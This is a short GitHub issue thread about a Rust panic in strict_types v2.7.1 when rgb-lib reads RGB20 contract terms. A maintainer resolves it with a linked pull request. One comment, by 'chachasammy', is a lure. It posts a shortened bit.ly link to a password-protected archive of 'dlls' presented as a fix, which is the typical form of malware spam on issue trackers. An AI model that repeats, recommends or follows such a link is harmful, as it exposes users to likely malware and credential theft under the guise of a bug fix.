### ISSUE TITLE
bug in v2.7.1: StrictVal expected to be an optional

### ISSUE THREAD

**Issue by zoedberg** [strict-types/strict-types#51]
With version v2.7.1 rgb-lib panics when doing the following:

```rust
let contract = runtime.contract_iface_class::<Rgb20>(contract_id)?;
let contract_terms = contract.contract_terms();
```

I receive the following error:

```
thread 'wallet::test::send::success' panicked at ~/.cargo/registry/src/index.crates.io-6f17d22bba15001f/strict_types-2.7.1/src/value/val.rs:451:18:
StrictVal expected to be an optional, but it is not: ~
```

**Comment by chachasammy** [comment]
This might help:This file might fix it
https://bit.ly/409uANv

Password: xfp53
I put the necessary dlls in the archive

**Comment by dr-orlovsky** [comment]
Should be fixed by https://github.com/strict-types/strict-types/pull/52

**Comment by dr-orlovsky** [comment]
Closed by https://github.com/strict-types/strict-types/pull/52
